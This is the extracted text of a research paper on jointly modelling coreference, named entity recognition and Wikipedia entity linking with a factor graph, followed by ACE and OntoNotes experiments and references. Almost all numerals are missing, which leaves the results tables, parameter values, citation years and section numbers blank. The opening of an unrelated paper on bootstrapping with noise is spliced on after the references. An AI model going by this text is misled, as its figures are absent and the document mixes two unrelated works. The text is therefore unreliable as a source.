first, in the candidate generation phase, a system generates a ranked set of possi- ble candidates for a given mention by querying wikipedia. the standard approach for doing so is to collect all hyperlinks in wikipedia and associate each hyperlinked span of text (e.g. michael jor- dan) with a distribution over titles of wikipedia ar- ticles it is observed to link to (michael jordan, michael i. jordan, etc.). second, in the dis- ambiguation phase, a learned model selects the cor- rect candidate from the set of possibilities. as noted by hachey et al. ( ) and guo et al. ( ), candidate generation is often overlooked and yet accounts for large gaps in performance between different systems. it is not always clear how to best turn the text of a mention into a query for our set of hyperlinks. for example, the phrase chief exec- utive michael dell has never been hyperlinked on wikipedia. if we query the substring michael dell, the highest-ranked title is correct; however, querying the substring dell returns the article on the company. our model for entity linking therefore includes both predictions of final wikipedia titles ei as well as latent query variables qi that model the choice of query. given a mention, possible queries are all pre- fixes of the mention containing the head with op- tional truecasing or lemmatization applied. unary factors on the qi model the appropriateness of a query based on surface text of the mention, in- vestigating the following properties: whether the mention is proper or nominal, whether the query employed truecasing or lemmatization, the query’s length, the pos tag sequence within the query and the tag immediately preceding it, and whether the query is the longest query to yield a nonempty set of candidates for the mention. this part of the model can learn, for example, that queries based on lemma- tized proper names are bad, whereas queries based on lemmatized common nouns are good. our set of candidates links for a mention is the set of all titles produced by some query. the bi- a a e e q q t dell ne r+ co ref li nk +c ore f ne r+ li nk the company ... posted ... t n e r c or ef l in k figure : factors that tie predictions between variables across tasks. joint ner and entity linking factors (sec- tion . . ) tie semantic information from wikipedia ar- ticles to semantic type predictions. joint coreference and ner factors (section . . ) couple type decisions between mentions, encouraging consistent type assign- ments within an entity. joint coreference and entity link- ing factors (section . . ) encourage relatedness between articles linked from coreferent mentions. nary factors connecting qi and ei then decide which title a given query should yield. these include: the rank of the article title among all possible ti- tles returned by that query (sorted by relative fre- quency count), whether the title is a close string match of the query, and whether the title matches the query up to a parenthetical (e.g. paul allen and paul allen (editor)). we could also at this point add factors between pairs of variables (ei,ej) to capture coherence be- tween choices of linked entities. integration with the rest of the model, learning, and inference would re- main unchanged. however, while such features have been employed in past entity linking systems (rati- nov et al., ; hoffart et al., ), ratinov et al. found them to be of limited utility, so we omit them from the present work. . 
cross-task interaction factors

we now add factors that tie the predictions of multiple output variables in a feature-based way. figure shows the general structure of these factors. each couples variables from one pair of tasks.

. . entity linking and ner

we want to exploit the semantic information in wikipedia for better semantic typing of mentions. we also want to use semantic types to disambiguate tricky wikipedia links. we use three sources of semantics from wikipedia (kazama and torisawa, ; nothman et al., ):

• categories (e.g. american financiers); used by ponzetto and strube ( ), kazama and torisawa ( ), and ratinov and roth ( )
• infobox type (e.g. person, company)
• copula in the first sentence (is a british politician); used for coreference previously in haghighi and klein ( )

we fire features that conjoin the information from the selected wikipedia article with the selected ner type. because these types of information from wikipedia are of a moderate granularity, we should be able to learn a mapping between them and ner types and exploit wikipedia as a soft gazetteer.

. . coreference and ner

coreference can improve ner by ensuring consistent semantic type predictions across coreferent mentions; likewise, ner can help coreference by encouraging the system to link up mentions of the same type. the factors we implement for these purposes closely resemble the factors employed for latent semantic clusters in durrett et al. ( ). that structure is as follows:

$\log f_{i-j}(a_i, t_i, t_j) = \begin{cases} 0 & \text{if } a_i \neq j \\ f(i, j, t_i, t_j) & \text{otherwise} \end{cases}$

that is, the features between the type variables for mentions i and j do not come into play unless i and j are coreferent. a minimal code sketch of this factor is given at the end of this section. note that there are quadratically many such factors in the graph (before pruning; see section ), one for each ordered pair of mentions (j, i) with j < i. when scoring a particular configuration of variables, only a small subset of the factors is active, but during inference when we marginalize over all settings of variables, each of the factors comes into play for some configuration. this model structure allows us to maintain uncertainty about coreference decisions but still propagate information along coreference arcs in a soft way. given this factor definition, we define features that should fire over coreferent pairs of entity types. our features target:

• the pair of semantic types for the current and antecedent mention
• the semantic type of the current mention and the head of the antecedent mention, and the type of the antecedent and head of the current

we found such monolexical features to improve over just type pairs while not suffering from the sparsity problems of bilexical features.

. . coreference and entity linking

as we said in section , coreferent mentions can actually have different entity links (e.g. dell and company), so encouraging equality alone is less effective for entity linking than it is for ner. our factors have the same structure as those for coreference-ner, but features now target overall semantic relatedness of wikipedia articles using the structure of wikipedia by computing whether the articles have the same title, share any out links, or link to each other. more complex relatedness schemes such as those described in ratinov et al. ( ) can be implemented in this framework. nevertheless, these basic features still promise to help identify related articles as well as name variations by exploiting the abundance of entity mentions on wikipedia.
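as a minimal illustration of the coreference-ner factor defined above, the following sketch scores one (antecedent, type, type) configuration; the concrete feature templates mirror the bullet list above, but the weights, the head-word lookup, and all names are stand-ins rather than the paper's actual feature set.

```python
# illustrative sketch of the coreference-ner factor log f_{i-j}(a_i, t_i, t_j):
# it contributes nothing unless mention i actually selects j as its antecedent.
def coref_ner_log_factor(i, j, a_i, t_i, t_j, weights):
    if a_i != j:
        return 0.0                                   # factor is inactive for this configuration
    features = [
        ("type_pair", t_i, t_j),                     # pair of semantic types
        ("cur_type_ant_head", t_i, head_word(j)),    # current type with antecedent head word
        ("ant_type_cur_head", t_j, head_word(i)),    # antecedent type with current head word
    ]
    return sum(weights.get(f, 0.0) for f in features)

def head_word(mention_index):
    # placeholder lookup; a real system reads this from the parsed document
    return ["dell", "company"][mention_index % 2]

weights = {("type_pair", "ORG", "ORG"): 1.2}
print(coref_ner_log_factor(1, 0, 0, "ORG", "ORG", weights))  # 1.2
```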
learning

our training data consists of d documents, where a given document consists of a tuple (x, c∗, t∗, e∗). gold-standard labels for types (t∗) and entity links (e∗) are provided directly, while supervision for coreference is provided in the form of a clustering c∗. regardless, we can simply marginalize over the uncertainty about a∗ and form the conditional log-likelihood of the training labels as follows:

$\ell(\theta) = \sum_{i=1}^{d} \log \sum_{a^* \in \mathcal{A}(C_i^*)} p(a^*, t_i^*, e_i^* \mid x; \theta)$

where $\mathcal{A}(C^*)$ is the set of antecedent structures consistent with the gold annotation: the first mention in a cluster must pick the new label and subsequent mentions must pick an antecedent from the set of those preceding them in the cluster. this marginalization over latent structure has been employed in prior work as well (fernandes et al., ; durrett and klein, ). we adapt this objective to exploit parameterized loss functions for each task by modifying the distribution as follows:

$p'(a, t, e \mid x; \theta) \propto p(a, t, e \mid x; \theta) \exp\big[\alpha_c \ell_c(a, C^*) + \alpha_t \ell_t(t, t^*) + \alpha_e \ell_e(e, e^*)\big]$

where $\ell_c$, $\ell_t$, and $\ell_e$ are task-specific loss functions with weight parameters α. this technique, softmax-margin, allows us to shape the distribution learned by the model and encourage the model to move probability mass away from outputs that are bad according to our loss functions (gimpel and smith, ). a minimal sketch of this loss augmentation appears below, after the results table. as in durrett and klein ( ), we take α_c = and use ℓ_c as defined there, penalizing the model by α_c,FA = . for linking up a mention that should have been nonanaphoric, by α_c,FN = for calling nonanaphoric a mention that should have an antecedent, and by α_c,WL = for picking the wrong antecedent for an anaphoric mention. ℓ_t and ℓ_e are simply hamming distance, with α_t = and α_e = for all experiments. we found that the outcome of learning was not particularly sensitive to these parameters. we optimize our objective using adagrad (duchi et al., ) with l regularization and λ = . . our final objective is

$\ell(\theta) = \sum_{i=1}^{d} \log \sum_{a^* \in \mathcal{A}(C_i^*)} p'(a^*, t_i^*, e_i^* \mid x; \theta) + \lambda \lVert \theta \rVert_1$

this objective is nonconvex, but in practice we have found that it is very stable. one reason is that for any mention that has fewer than two antecedents in its cluster, all elements of $\mathcal{A}(C^*)$ only contain one possibility for that mention, and even for mentions with ambiguity, the parameters that the model ends up learning tend to place almost all of the probability mass consistently on one antecedent. these parameters allow us to trade off contributions to the objective from the different tasks, addressing singh et al. ( )'s objection to single objectives for joint models.

table (rows: indep., joint, ∆; columns for both dev and test: muc, b, ceafe, avg., ner, link): results on the ace dev and test sets for the indep. (task-specific factors only) and joint models. coreference metrics are computed using their reference implementations (pradhan et al., ). we report accuracy on ner because the set of mentions is fixed and all mentions have named entity types. coreference and ner are compared to prior work in a more standard setting in section . . finally, we also report accuracy of our entity linker (including links to nil); entity linking is analyzed more thoroughly in table . bolded values represent statistically significant improvements with p < . according to a bootstrap resampling test.
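the softmax-margin modification above amounts to adding a weighted loss term to the score of every candidate output before normalization, so that maximizing the gold output's probability under the augmented distribution forces a margin against bad outputs. a minimal sketch over a single output variable with hamming loss (the structure and names are ours, not the paper's code):

```python
import math

# illustrative softmax-margin sketch for one output variable with hamming loss:
# every non-gold value's score is boosted by alpha during training, so the model
# must drive the gold value's score up by a margin to keep its probability high.
def loss_augmented_distribution(scores, gold_value, alpha=3.0):
    """scores: dict value -> model score (log potential)."""
    augmented = {v: s + (alpha if v != gold_value else 0.0) for v, s in scores.items()}
    z = math.log(sum(math.exp(s) for s in augmented.values()))
    return {v: math.exp(s - z) for v, s in augmented.items()}

scores = {"PERSON": 2.0, "ORG": 1.5, "GPE": 0.1}
print(loss_augmented_distribution(scores, gold_value="ORG"))  # wrong labels gain mass under p'
```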
exact infer- ence is intractabile due to our factor graph’s loopi- ness; however, we can still perform efficient infer- ence using belief propagation, which has been suc- cessfully employed for a similar model (durrett et al., ) as well as for other nlp tasks (smith and eisner, ; burkett and klein, ). marginals typically converge in - iterations of belief propa- gation; we use iterations for all experiments. however, belief propagation would still be quite computationally expensive if run on the full fac- tor graph as described in section . in particu- lar, the factors in section . . and section . . are costly to sum over due to their ternary struc- ture and the fact that there are quadratically many of them in the number of mentions. the solu- tion to this is to prune the domains of the corefer- ence variables using a coarse model consisting of the coreference factors trained in isolation. given marginals p (ai|x), we prune values ai such that log p (ai|x) < log p (a∗i |x) −k for a threshold pa- rameter k, which we set to for our experiments; this is sufficient to prune over % of possible coref- erence arcs while leaving at least one possible gold link for % of mentions. with this optimization, our full joint model could be trained for iterations on the ace corpus in around an hour. we use minimum bayes risk (mbr) decoding, in addition to inferential benefits, pruning an arc allows us to prune entire joint coreference factors and avoid instantiating their associated features, which reduces the memory footprint and time needed to build a factor graph. where we compute marginals for each variable un- der the full model and independently return the most likely setting of each variable. note that for coref- erence, this implies that we produce the mbr an- tecedent structure rather than the mbr clustering; the latter is much more computationally difficult to find and would be largely the same, since the poste- rior distributions of the ai are quite peaked. experiments we present results on two corpora. first, we use the ace corpus (nist, ): this corpus anno- tates mentions complete with coreference, semantic types (per mention), and entity links (also per men- tion) later added by bentivogli et al. ( ). we evaluate on gold mentions in this setting for com- parability with prior work on entity linking; we lift this restriction in section . . second, we evaluate on the ontonotes corpus (hovy et al., ) as used in the conll coreference shared task (pradhan et al., ). this corpus does not contain gold-standard entity links, so we cannot evaluate this portion of our model, though the model still exploits the information from wikipedia to make coreference and named entity de- cisions. we will compare to prior coreference and named entity work in the system mentions setting. . ace evaluation we tokenize and sentence-split the ace dataset us- ing the tools bundled with reconcile (stoyanov et al., ) and parse it using the berkeley parser (petrov et al., ). we use the train/test split from stoyanov et al. ( ), haghighi and klein ( ), and bansal and klein ( ). non-nils nils prec. rec. f prec. rec. f accuracy fahrni . . . . . . . indep. . . . . . . . joint . . . . . . . ∆ over indep. + . + . + . + . + . + . + . table : detailed entity linking results on the ace test set. we evaluate both our indep. (task-specific factors only) and joint models and compare to the results of the fahrni model, a state-of-the-art entity linking system. 
we compare overall accuracy as well as performance at predicting nils (mentions not in the knowledge base) and non- nils. the joint model roughly matches the performance of fahrni and gives strong gains over the indep. system. table shows our results. coreference results are reported using muc (vilain et al., ), b (bagga and baldwin, ), and ceafe (luo, ), as well as their average, the conll metric, all com- puted from the reference implementation of the conll scorer (pradhan et al., ). we see that the joint model improves all three tasks compared to the individual task models in the baseline. more in-depth entity linking results are shown in table . we both evaluate on overall accuracy (how many mentions are correctly linked) as well as two more specific criteria: precision/recall/f of non- nil predictions, and precision/recall/f of nil pre- dictions. this latter measure may be important if a system designer is trying to identify new entities in a document. we compare to the results of the best model from fahrni and strube ( ), which is a sophisticated discriminative model incorporating a latent model of mention scope. our performance is similar to that of fahrni and strube ( ), though the results are not exactly comparable for two reasons. first, our models are trained on different datasets: fahrni and strube ( ) train on wikipedia data whereas we train on the ace training set. second, they make use of the annotated head spans in ace whereas we only use detected heads based on automatic parses. note that this information is particularly beneficial for locat- ing the right query because “heads” may be multi- word expressions such as west bank as part of the phrase southern west bank. nil is a placeholder for mentions which do not link to an article in wikipedia. on the tac datasets, this fahrni model substantially out- performs ratinov et al. ( ) and has comparable performance to cheng and roth ( ), hence it is quite competitive. coref ner link indep. . . . indep+linkner + . + . indep+corefner + . + . indep+coreflink + . − . joint−linkner + . + . − . joint−corefner + . + . + . joint−coreflink + . + . + . joint + . + . + . joint/latentlink + . + . − . table : results of model ablations on the ace devel- opment set. we hold out each type of factor in turn from the joint model and add each in turn over the in- dep. model. we evaluate the coreference performance using the conll metric, ner accuracy, and entity link- ing accuracy. . model ablations to evaluate the importance of the different parts of the model, we perform a series of ablations on the model interaction factors. table shows the results of adding each interaction factor in turn to the base- line and removing each of the three interaction fac- tors from the full joint model (see figure ). link–ner interactions. these joint factors are the strongest out of any considered here and give large improvements to entity linking and ner. their utility is unsurprising: effectively, they give ner ac- cess to a gazetteer that it did not have in the baseline model. moreover, our relatively rich featurization of the semantic information on wikipedia allows the model to make effective use of it. coref–ner interactions. these are moderately beneficial to both coreference and ner. having re- liable semantic types allows the coreference system to be bolder about linking up mention pairs that do not exhibit direct head matches. 
part of this is due to our use of monolexical features, which are fine- grained enough to avoid the problems with coarse semantic type matching (durrett and klein, ) but still effectively learnable. coref–link interactions. these are the least use- ful of any of the major factors, providing only a small benefit to coreference. this is likely a re- sult of the ace entity linking annotation standard: a mention like the company is not linked to the spe- cific company it refers to, but instead the wikipedia article company. determining the relatedness of company to an article like dell is surprisingly difficult: many related articles share almost no out- links and may not explicitly link to one another. further feature engineering could likely improve the utility of these factors. the last line of table shows the results of an ex- periment where the entity links were not observed during training, i.e. they were left latent. unsur- prisingly, the system is not good at entity linking; however, the model is still able to do as well or even slightly better on coreference and named entity recognition. a possible explanation for this is that even the wrong wikipedia link can in many cases provide correct semantic information: for example, not knowing which donald layton is being referred to is irrelevant for the question of determining that he is a person and may also have little impact on coreference performance. this result indicates that the joint modeling approach is not necessarily de- pendent on having all tasks annotated. the model can make use of cross-task information even when that information comes via latent variables. . ontonotes evaluation the second part of our evaluation uses the datasets from the conll shared task (pradhan et al., ), specifically the coreference and ner anno- tations. all experiments use the standard automatic parses from the shared task and mentions detected according to the method of durrett and klein ( ). evaluating on ontonotes carries with it a few complications. first, gold-standard entity linking annotations are not available; we can handle this by a a e e q q t t dell }o b-org i-org ... ... ne r+ co ref li nk +c ore f ne r+ li nk the company ... t t posted ... figure : modified factor graph for ontonotes-style an- notations, where ner chunks can now diverge from men- tions for the other two tasks. ner is now modeled with token-synchronous random variables taking values in a bio tagset. factors coupling ner and the other tasks now interact with the ner chain via the ner nodes as- sociated with the heads of mentions. leaving the ei variables in our model latent. second, and more seriously, ner chunks are no longer the same as coreference mentions, so our assumption of fixed ner spans no longer holds. . . divergent coreference and ner our model can be adapted to handle ner chunks that diverge from mentions for the other two tasks, as shown in figure . we have kept the coreference and entity linking portions of our model the same, now defined over system predicted mentions. however, we have replaced mention-synchronous type vari- ables with standard token-synchronous bio-valued variables. the unary ner features developed in section . . are now applied in the standard way, namely they are conjoined with the bio labels at each token position. binary factors between adja- cent ner nodes enforce appropriate structural con- straints and fire indicator features on transitions. 
in order to maintain tractability in the face of a larger number of variables and factors in the ner portion of our model, we prune the ner variables’ domains using the ner model trained in isolation, similar to the procedure that we described for pruning corefer- ence arcs in section . muc b ceafe avg. prec. rec. f prec. rec. f prec. rec. f f berkeley . . . . . . . . . . fernandes − − . − − . − − . . bjorkelund . . . . . . . . . . indep. . . . . . . . . . . joint . . . . . . . . . . table : conll metric scores for our systems on the conll blind test set, compared to durrett and klein ( ) (the berkeley system), fernandes et al. ( ) (the winner of the conll shared task), and björkelund and kuhn ( ) (the best reported results on the dataset to date). indep. and joint are the contributions of this work; joint improves substantially over indep. (these improvements are statistically significant with p < . according to a bootstrap resampling test) and achieves state-of-the-art results. cross-task factors that previously would have fired features based on the ne type for a whole men- tion now instead consult the ne type of that men- tion’s head. in figure , this can be seen with fac- tors involving e and a touching t (company), the head of the second mention. since the chain struc- ture enforces consistency between adjacent labels, features that strongly prefer a particular label on one node of a mention will implicitly affect other nodes in that mention and beyond. training and inference proceed as before, with a slight modification: instead of computing the mbr setting of every variable in isolation, we instead compute the mbr sequence of labeled ner chunks to avoid the problem of producing inconsistent tag sequences, e.g. o i-per or b-per i-org. . . results table shows coreference results from our in- dep. and joint models compared to three strong systems: durrett and klein ( ), fernandes et al. ( ) (the winner of the conll shared task), and björkelund and kuhn ( ) (the best reported re- sults on the dataset). our joint method outper- forms all three as well as the indep. system. next, we report results on named entity recogni- tion. we use the same ontonotes splits as for the coreference data; however, the new testament (nt) the ner-coreference portion of the model now resembles the skip-chain crf from finkel et al. ( ), though with soft coreference. the systems of chang et al. ( ) and webster and curran ( ) perform similarly to the fernandes system; changes in the reference implementation of the metrics make exact com- parison to printed numbers difficult. prec. rec. f illinois . . . passos − − . indep. . . . joint . . . ∆ over indep. + . + . + . table : results for ner tagging on the ontonotes . / conll test set. we compare our systems to the illinois system (ratinov and roth, ) and the system of passos et al. ( ). our model outperforms both other systems in terms of f , and once again joint modeling gives substantial improvements over our baseline system. portion of the conll test set does not have gold-standard named entity annotations, so we omit it from our evaluation. this leaves us with exactly the conll test set. we compare to two ex- isting baselines from the literature: the illinois ner system of ratinov and roth ( ) and the results of passos et al. ( ). table shows that we out- perform both prior systems in terms of f , though the illinois system features higher recall while our system features higher precision. 
related work there are two closely related threads of prior work: those that address the tasks we consider in a dif- ferent way and those that propose joint models for other related sets of tasks. in the first category, hajishirzi et al. ( ) integrate entity linking into a sieve-based coreference system (raghunathan et al., ), the aim being to propagate link deci- sions throughout coreference chains, block corefer- ence links between different entities, and use seman- tic information to make additional coreference links. zheng et al. ( ) build coreference clusters greed- ily left-to-right and maintain entity link information for each cluster, namely a list of possible targets in the knowledge base as well as a current best link tar- get that is used to extract features (though that might not be the target that is chosen by the end of infer- ence). cheng and roth ( ) use coreference as a preprocessing step for entity linking and then solve an ilp to determine the optimal entity link assign- ments for each mention based on surface properties of that mention, other mentions in its cluster, and other mentions that it is related to. compared to these systems, our approach maintains greater un- certainty about all random variables throughout in- ference and uses features to capture cross-task in- teractions as opposed to rules or hard constraints, which can be less effective for incorporating seman- tic knowledge (lee et al., ). the joint model most closely related to ours is that of singh et al. ( ), modeling coreference, named entity recognition, and relation extraction. their techniques differ from ours in a few notable ways: they choose a different objective function than we do and also opt to freeze the values of certain vari- ables during the belief propagation process rather than pruning with a coarse pass. sil and yates ( ) jointly model ner and entity linking in such a way that they maintain uncertainty over mention bound- aries, allowing information from wikipedia to in- form segmentation choices. we could strengthen our model by integrating this capability; however, the primary cause of errors for mention detection on ontonotes is parsing ambiguities rather than named entity ambiguities, so we would be unlikely to see improvements in the experiments presented here. beyond maintaining uncertainty over men- tion boundaries, we might also consider maintain- ing uncertainty over the entire parse structure, as in finkel and manning ( ), who consider parsing and named entity recognition together with a pcfg. conclusion we return to our initial motivation for joint model- ing, namely that the three tasks we address have the potential to influence one another. table shows that failing to exploit any of the pairwise interac- tions between the tasks causes lower performance on at least one of them. therefore, any pipelined sys- tem would necessarily underperform a joint model on whatever task came first in the pipeline, which is undesirable given the importance of these tasks. the trend towards broader and deeper nlp pipelines will only exacerbate this problem and make it more dif- ficult to find a suitable pipeline ordering. in addition to showing that joint modeling is high-performing, we have also shown that it can be implemented with relatively low overhead, requiring no fundamentally new learning or inference techniques, and that it is extensible, due to its modular structure and natural partitioning of features. 
taken together, these as- pects make a compelling case that joint models can provide a way to integrate deeper levels of process- ing, particularly for semantic layers of annotation, and that this modeling power does not need to come at the expense of computational efficiency, structural simplicity, or modularity. the berkeley entity resolution system is avail- able at http://nlp.cs.berkeley.edu. acknowledgments this work was partially supported by bbn under darpa contract hr - -c- , by an nsf fellowship for the first author, and by a google fac- ulty research award to the second author. thanks to angela fahrni for helpful discussions about en- tity linking and for providing system output, to the anonymous reviewers for their insightful comments, and to our action editor jason eisner. references amit bagga and breck baldwin. . algorithms for scoring coreference chains. in proceedings of the conference on language resources and evaluation workshop on linguistics coreference. mohit bansal and dan klein. . coreference seman- tics from web features. in proceedings of the associ- ation for computational linguistics. luisa bentivogli, pamela forner, claudio giuliano, alessandro marchetti, emanuele pianta, and kateryna tymoshenko. . extending english ace corpus annotation with ground-truth links to wikipedia. in proceedings of the workshop on the people’s web meets nlp: collaboratively con- structed semantic resources. anders björkelund and jonas kuhn. . learn- ing structured perceptrons for coreference resolution with latent antecedents and non-local features. in proceedings of the association for computational lin- guistics. david burkett and dan klein. . fast inference in phrase extraction models with belief propagation. in proceedings of the north american chapter of the as- sociation for computational linguistics. kai-wei chang, rajhans samdani, and dan roth. . a constrained latent variable model for coreference resolution. in proceedings of the conference on em- pirical methods in natural language processing. xiao cheng and dan roth. . relational inference for wikification. in proceedings of the conference on empirical methods in natural language processing. silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in proceed- ings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll). hal daumé, iii and daniel marcu. . a large-scale exploration of effective global features for a joint entity detection and tracking model. in proceedings of the conference on empirical methods in natural language processing. pascal denis and jason baldridge. . specialized models and ranking for coreference resolution. in proceedings of the conference on empirical methods in natural language processing. mark dredze, paul mcnamee, delip rao, adam ger- ber, and tim finin. . entity disambiguation for knowledge base population. in proceedings of the in- ternational conference on computational linguistics. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – , july. greg durrett and dan klein. . easy victories and uphill battles in coreference resolution. in proceed- ings of the conference on empirical methods in natu- ral language processing, october. greg durrett, david hall, and dan klein. . decen- tralized entity-level modeling for coreference reso- lution. 
in proceedings of the association for compu- tational linguistics. angela fahrni and michael strube. . a latent variable model for discourse-aware concept and en- tity disambiguation. in proceedings of the european chapter of the association for computational linguis- tics. eraldo rezende fernandes, cı́cero nogueira dos santos, and ruy luiz milidiú. . latent structure per- ceptron with feature induction for unrestricted coref- erence resolution. in proceedings of the joint con- ference on empirical methods in natural language proceedings and conference on computational nat- ural language learning - shared task. jenny rose finkel and christopher d. manning. . joint parsing and named entity recognition. in pro- ceedings of the north american chapter for the asso- ciation for computational linguistics. jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local information into information extraction systems by gibbs sam- pling. in proceedings of the association for computa- tional linguistics. kevin gimpel and noah a. smith. . softmax- margin crfs: training log-linear models with cost functions. in proceedings of the north american chapter for the association for computational lin- guistics. yuhang guo, bing qin, yuqin li, ting liu, and sheng li li. . improving candidate generation for entity linking. in natural language processing and infor- mation systems. ben hachey, will radford, joel nothman, matthew hon- nibal, and james r. curran. . evaluating en- tity linking with wikipedia. artificial intelligence, : – , january. aria haghighi and dan klein. . simple coreference resolution with rich syntactic and semantic features. in proceedings of the conference on empirical meth- ods in natural language processing. aria haghighi and dan klein. . coreference res- olution in a modular, entity-centered model. in pro- ceedings of the north american chapter of the asso- ciation for computational linguistics. hannaneh hajishirzi, leila zilles, daniel s. weld, and luke zettlemoyer. . joint coreference res- olution and named-entity linking with multi-pass sieves. in proceedings of the conference on empir- ical methods in natural language processing. johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proceedings of the conference on empirical methods in natural language processing. eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of the north ameri- can chapter of the association for computational lin- guistics: short papers. heng ji and ralph grishman. . knowledge base population: successful approaches and challenges. in proceedings of the association for computational linguistics. jun’ichi kazama and kentaro torisawa. . exploit- ing wikipedia as external knowledge for named en- tity recognition. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of the association for computational lin- guistics. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: proba- bilistic models for segmenting and labeling sequence data. in proceedings of the international conference on machine learning. 
heeyoung lee, yves peirsman, angel chang, nathanael chambers, mihai surdeanu, and dan jurafsky. . stanford’s multi-pass sieve coreference resolution system at the conll- shared task. in proceed- ings of the conference on computational natural lan- guage learning: shared task. qi li and heng ji. . incremental joint extraction of entity mentions and relations. in proceedings of the association for computational linguistics. xiaoqiang luo. . on coreference resolution per- formance metrics. in proceedings of the conference on empirical methods in natural language process- ing. david milne and ian h. witten. . learning to link with wikipedia. in proceedings of the conference on information and knowledge management. vincent ng. . supervised noun phrase coreference research: the first fifteen years. in proceedings of the association for computational linguistics. nist. . the ace evaluation plan. in nist. joel nothman, nicky ringland, will radford, tara mur- phy, and james r. curran. . learning multilin- gual named entity recognition from wikipedia. arti- ficial intelligence, : – , january. alexandre passos, vineet kumar, and andrew mccal- lum. . lexicon infused phrase embeddings for named entity resolution. in proceedings of the con- ference on computational natural language learn- ing. slav petrov, leon barrett, romain thibaux, and dan klein. . learning accurate, compact, and inter- pretable tree annotation. in proceedings of the con- ference on computational linguistics and the associ- ation for computational linguistics. simone paolo ponzetto and michael strube. . exploiting semantic role labeling, wordnet and wikipedia for coreference resolution. in proceed- ings of the north american chapter of the association of computational linguistics. sameer pradhan, lance ramshaw, mitchell marcus, martha palmer, ralph weischedel, and nianwen xue. . conll- shared task: modeling unre- stricted coreference in ontonotes. in proceedings of the conference on computational natural language learning: shared task. sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multilingual unre- stricted coreference in ontonotes. in joint confer- ence on emnlp and conll - shared task. sameer pradhan, xiaoqiang luo, marta recasens, ed- uard hovy, vincent ng, and michael strube. . scoring coreference partitions of predicted mentions: a reference implementation. in proceedings of the association for computational linguistics. karthik raghunathan, heeyoung lee, sudarshan ran- garajan, nathanael chambers, mihai surdeanu, dan jurafsky, and christopher manning. . a multi- pass sieve for coreference resolution. in proceed- ings of the conference on empirical methods in natu- ral language processing. altaf rahman and vincent ng. . coreference res- olution with world knowledge. in proceedings of the association for computational linguistics: hu- man language technologies. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in proceedings of the conference on computational nat- ural language learning. lev ratinov and dan roth. . learning-based multi-sieve co-reference resolution with knowledge. in proceedings of the joint conference on empirical methods in natural language processing and com- putational natural language learning. lev ratinov, dan roth, doug downey, and mike ander- son. . local and global algorithms for disam- biguation to wikipedia. in proceedings of the associ- ation for computational linguistics. 
avirup sil and alexander yates. . re-ranking for joint named-entity recognition and linking. in proceedings of the international conference on information and knowledge management.
sameer singh, sebastian riedel, brian martin, jiaping zheng, and andrew mccallum. . joint inference of entities, relations, and coreference. in proceedings of the workshop on automated knowledge base construction.
david a. smith and jason eisner. . dependency parsing by belief propagation. in proceedings of the conference on empirical methods in natural language processing.
wee meng soon, hwee tou ng, and daniel chung yong lim. . a machine learning approach to coreference resolution of noun phrases. computational linguistics, ( ): – , december.
veselin stoyanov, nathan gilbert, claire cardie, and ellen riloff. . conundrums in noun phrase coreference resolution: making sense of the state-of-the-art. in proceedings of the association for computational linguistics.
veselin stoyanov, claire cardie, nathan gilbert, ellen riloff, david buttler, and david hysom. . coreference resolution with reconcile. in proceedings of the association for computational linguistics: short papers.
marc vilain, john burger, john aberdeen, dennis connolly, and lynette hirschman. . a model-theoretic coreference scoring scheme. in proceedings of the conference on message understanding.
kellie webster and james r. curran. . limited memory incremental coreference resolution. in proceedings of the conference on computational linguistics.
tong zhang and david johnson. . a robust risk minimization based named entity recognition system. in proceedings of the conference on natural language learning.
jiaping zheng, luke vilnis, sameer singh, jinho d. choi, and andrew mccallum. . dynamic knowledge-base alignment for coreference resolution. in proceedings of the conference on computational natural language learning.
connection science, vol. , nos &

bootstrapping with noise: an effective regularization technique

yuval raviv & nathan intrator
school of mathematical sciences, sackler faculty of exact sciences, tel-aviv university, ramat aviv, israel. e-mail: {yuv,nin}@math.tau.ac.il. present address of n. intrator: institute of brain and neural systems, brown university, providence, ri, usa.

abstract bootstrap samples with noise are shown to be an effective smoothness and capacity control technique for training feedforward networks and for other statistical methods such as generalized additive models. it is shown that noisy bootstrap performs best in conjunction with weight-decay regularization and ensemble averaging. the two-spiral problem, a highly non-linear, noise-free data set, is used to demonstrate these findings. the combination of noisy bootstrap and ensemble averaging is also shown to be useful for generalized additive modelling, and is also demonstrated on the well-known cleveland heart data.

keywords: noise injection, combining estimators, pattern classification, two-spiral problem, clinical data analysis.

. introduction

the bootstrap technique has become one of the major tools for producing empirical confidence intervals of estimated parameters or predictors (efron & tibshirani, ). one way to view bootstrap is as a method to simulate noise inherent in the data, and thus effectively increase the number of training patterns. a simple bootstrap procedure amounts to sampling with return from the training data, and constructing several training sets, all with the same size as the original training set. later, the variability between the estimated parameters can be measured, and give some indication about the true variability of the model parameters arising from the data. furthermore, variability of the prediction, or error bars on the prediction, can also be estimated in this way. one variant of bootstrap involves estimation of a model of the form y = f(x) + ε for some parametric family to which f belongs, and a noise ε which is assumed to be small with zero mean. once an empirical function f̂ has been estimated from n training samples, there remains a noise vector ε = (ε_1, …, ε_n). one can then sample from the empirical distribution of the noise by sampling (with return) from the ε_i and constructing new samples of the form (x*_i, y*_i), in which ε_i was replaced by ε*_i sampled from the above set. clearly, this approach can be easily extended to a smoothed bootstrap (efron & tibshirani, ) by sampling from the empirical distribution of the ε_i rather than just sampling from the set of ε_i's. in such a case, one can increase the size of each bootstrap set, since due to the noise, the different sets are sufficiently independent.
